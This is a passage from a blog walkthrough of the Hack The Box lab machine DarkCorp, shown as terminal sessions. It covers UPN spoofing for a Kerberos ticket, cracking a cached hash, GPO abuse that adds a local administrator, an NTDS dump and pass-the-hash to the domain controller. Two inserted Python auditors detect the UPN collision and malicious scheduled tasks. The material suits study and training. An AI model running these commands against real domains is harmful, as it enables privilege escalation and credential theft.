┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ bloodyAD --host dc-01 -d darkcorp.htb -u john.w -p 'Pack_Beneath_Solid9!' set object 'CN=Angela Williams,CN=Users,DC=darkcorp,DC=htb' userPrincipalName -v angela.w.adm
[+] CN=Angela Williams,CN=Users,DC=darkcorp,DC=htb's userPrincipalName has been updated

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ impacket-getTGT -hashes :957246c8137069bca672dc6aa0af7c7a -principalType NT_ENTERPRISE darkcorp.htb/angela.w.adm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in angela.w.adm.ccache

ksu to angela.w.adm and then su to [email protected]:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ ssh [email protected]
[email protected]'s password:
Linux drip 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have no mail.
Last login: Sat Feb 15 04:33:58 2025 from 172.16.20.1
ebelford@drip:~$ ls
agent angela.w.adm.ccache
ebelford@drip:~$ KRB5CCNAME=angela.w.adm.ccache ksu angela.w.adm
Authenticated [email protected]
Account angela.w.adm: authorization for [email protected] successful
Changing uid to angela.w.adm (1730401107)
angela.w.adm@drip:/home/ebelford$ id
uid=1730401107(angela.w.adm) gid=1730400513(domain users) groups=1730400513(domain users),1730401109(linux_admins)
angela.w.adm@drip:/home/ebelford$ sudo su
root@drip:/home/ebelford# id
uid=0(root) gid=0(root) groups=0(root)
root@drip:/home/ebelford#
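
The steps above work because one account's userPrincipalName was set to a value that equals another account's sAMAccountName, and the Linux host then mapped the Kerberos principal to a local user by name. As an added example (not part of the original write-up or of any tool it uses), the check below audits a directory export for exactly that collision. The records are constructed, and the dictionary layout of the export is an assumption.

```python
# Constructed directory export. The sAMAccountName values mirror the two
# accounts in this walkthrough; DNs and UPN suffixes are made up.
ACCOUNTS = [
    {"dn": "CN=Angela Williams,CN=Users,DC=example,DC=test",
     "sAMAccountName": "angela.w", "userPrincipalName": "angela.w.adm"},
    {"dn": "CN=Angela Williams (adm),CN=Users,DC=example,DC=test",
     "sAMAccountName": "angela.w.adm",
     "userPrincipalName": "angela.w.adm@example.test"},
    {"dn": "CN=John Doe,CN=Users,DC=example,DC=test",
     "sAMAccountName": "john.d", "userPrincipalName": "john.d@example.test"},
    {"dn": "CN=Backup Service,CN=Users,DC=example,DC=test",
     "sAMAccountName": "svc_backup", "userPrincipalName": None},
]


def upn_name_part(upn):
    """Name component of a UPN, lower-cased; a UPN without '@' is all name."""
    return upn.split("@", 1)[0].strip().lower()


def find_upn_collisions(accounts):
    """Return accounts whose UPN name part is another account's sAMAccountName."""
    by_sam = {}
    for acct in accounts:
        by_sam.setdefault(acct["sAMAccountName"].lower(), []).append(acct)

    findings = []
    for acct in accounts:
        upn = acct.get("userPrincipalName")
        if not upn:
            continue  # no explicit UPN set, nothing to compare
        for other in by_sam.get(upn_name_part(upn), []):
            if other["dn"] == acct["dn"]:
                continue  # a UPN that repeats the account's own name is normal
            findings.append({
                "account": acct["sAMAccountName"],
                "upn": upn,
                "collides_with": other["sAMAccountName"],
                "collides_with_dn": other["dn"],
            })
    return findings


if __name__ == "__main__":
    for f in find_upn_collisions(ACCOUNTS):
        print(f"{f['account']}: UPN {f['upn']!r} matches the logon name "
              f"of {f['collides_with']} ({f['collides_with_dn']})")
```

Any hit is worth reviewing together with who holds write access to userPrincipalName on the flagged account.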

root@drip:/home/ebelford# strings /var/lib/sss/db/cache_darkcorp.htb.ldb | grep '\$6' | sed 's/.*\$6/\$6/' | sed 's/\\00.*//' | sort | uniq
$6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQQ93ESam/OHvlnQKQppk6DrNjL6ruzY7WJkA2FjPgULqxlb73xNw7n5.
root@drip:/home/ebelford#

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!QAZzaq1 (?)
1g 0:00:00:26 DONE (2025-02-15 13:29) 0.03818g/s 3802p/s 3802c/s 3802C/s 020180..thunder22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Establish and link a new GPO, because with taylor we are a member of GPO_MANAGER:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/pyGPOAbuse]
└─$ python3 pygpoabuse.py darkcorp.htb/taylor.b.adm:'!QAZzaq1' -gpo-id 652CAE9A-4BB7-49F2-9E52-3361F33CE786 -command 'net localgroup Administrators DARKCORP.HTB\taylor.b.adm /add' -taskname "LocalAdmin" -description "pop" -dc-ip 172.16.20.1 -v
/home/kali/Hackthebox/DarkCorp/pyGPOAbuse/pygpoabuse/scheduledtask.py:54: SyntaxWarning: invalid escape sequence '\%'
self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%LogonDomain%\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
/home/kali/Hackthebox/DarkCorp/pyGPOAbuse/pygpoabuse/scheduledtask.py:54: SyntaxWarning: invalid escape sequence '\%'
self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%LogonDomain%\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
INFO:root:Version updated
[*] Version updated
SUCCESS:root:ScheduledTask LocalAdmin created!
[+] ScheduledTask LocalAdmin created!
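
The task created above lands in the GPO as an `ImmediateTaskV2` element in the Group Policy Preferences file `ScheduledTasks.xml` (under `Machine\Preferences\ScheduledTasks` in the GPO's SYSVOL folder), with the structure visible in the template printed in the warning. The following is an added example, not part of the original write-up or of pyGPOAbuse: it audits such a file and flags V2 tasks whose command line changes group membership or creates accounts. The XML sample is constructed, and the two regular expressions are heuristics chosen for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed ScheduledTasks.xml content: one immediate task shaped like the
# one in this walkthrough, and one ordinary maintenance task.
SAMPLE_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="LocalAdmin"
      image="0" changed="2025-02-15 13:30:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="LocalAdmin" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId>
          <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
        <Actions Context="Author"><Exec><Command>c:\windows\system32\cmd.exe</Command>
          <Arguments>/c "net localgroup Administrators EXAMPLE\jdoe.adm /add"</Arguments>
        </Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="Defrag" image="2" changed="2024-11-02 08:00:00"
      uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" name="Defrag" runAs="NT AUTHORITY\LocalService" logonType="S4U">
      <Task version="1.2">
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\LocalService</UserId>
          <RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
        <Actions Context="Author"><Exec><Command>defrag.exe</Command>
          <Arguments>C: /O</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

# Heuristics (assumptions of this example, not an exhaustive list).
GROUP_CHANGE = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:localgroup|group)\b.*?/add\b|\bAdd-LocalGroupMember\b",
    re.IGNORECASE | re.DOTALL)
ACCOUNT_CREATE = re.compile(
    r"\bnet1?(?:\.exe)?\s+user\b.*?/add\b|\bNew-LocalUser\b",
    re.IGNORECASE | re.DOTALL)


def audit_scheduled_tasks(xml_text):
    """Return one record per Exec action of every V2 task, with review reasons."""
    root = ET.fromstring(xml_text)
    results = []
    for node in root:  # direct children only, so the inner <Task> is not matched
        if node.tag not in ("ImmediateTaskV2", "TaskV2"):
            continue
        props = node.find("Properties")
        if props is None:
            continue
        run_level = (props.findtext(".//RunLevel") or "").strip()
        for action in props.iter("Exec"):
            command = (action.findtext("Command") or "").strip()
            arguments = (action.findtext("Arguments") or "").strip()
            cmdline = f"{command} {arguments}"
            reasons = []
            if GROUP_CHANGE.search(cmdline):
                reasons.append("changes group membership")
            if ACCOUNT_CREATE.search(cmdline):
                reasons.append("creates an account")
            if reasons and node.tag == "ImmediateTaskV2":
                reasons.append("immediate task, runs at the next policy refresh")
            if reasons and run_level == "HighestAvailable":
                reasons.append("runs with highest available privileges")
            results.append({
                "name": node.get("name"), "kind": node.tag,
                "changed": node.get("changed"), "run_as": props.get("runAs"),
                "command": command, "arguments": arguments, "reasons": reasons,
            })
    return results


if __name__ == "__main__":
    for task in audit_scheduled_tasks(SAMPLE_XML):
        if task["reasons"]:
            print(task["name"], task["changed"], task["run_as"], task["reasons"])
```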

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/pyGPOAbuse]
└─$ evil-winrm -i dc-01.darkcorp.htb -u taylor.b.adm -p '!QAZzaq1'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.


===>

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/pyGPOAbuse]
└─$ nxc smb dc-01 -u taylor.b.adm -p '!QAZzaq1' --ntds --user Administrator
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\taylor.b.adm:!QAZzaq1 (Pwn3d!)
SMB 172.16.20.1 445 DC-01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.16.20.1 445 DC-01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:fcb3ca5a19a1ccf2d14c13e8b64cde0f:::
SMB 172.16.20.1 445 DC-01 [+] Dumped 1 NTDS hashes to /home/kali/.nxc/logs/DC-01_172.16.20.1_2025-02-15_133234.ntds of which 1 were added to the database
SMB 172.16.20.1 445 DC-01 [*] To extract only enabled accounts from the output file, run the following command:
SMB 172.16.20.1 445 DC-01 [*] cat /home/kali/.nxc/logs/DC-01_172.16.20.1_2025-02-15_133234.ntds | grep -iv disabled | cut -d ':' -f1
SMB 172.16.20.1 445 DC-01 [*] grep -iv disabled /home/kali/.nxc/logs/DC-01_172.16.20.1_2025-02-15_133234.ntds | cut -d ':' -f1

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/pyGPOAbuse]
└─$ evil-winrm -i dc-01.darkcorp.htb -u Administrator -H 'fcb3ca5a19a1ccf2d14c13e8b64cde0f'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
48ccc2ca67579f0154b4d8abec998a14
*Evil-WinRM* PS C:\Users\Administrator\Documents>

This was what I wrote on my notes when I finished the machine lol:

Finally

  • Title: Hackthebox: DarkCorp
  • Author: Foued SAIDI
  • Created at : 2025-10-18 20:20:18
  • Updated at : 2025-10-18 21:02:47
  • Link: https://kujen5.github.io/2025/10/18/Hackthebox-DarkCorp/
  • License: This work is licensed under CC BY-NC-SA 4.0.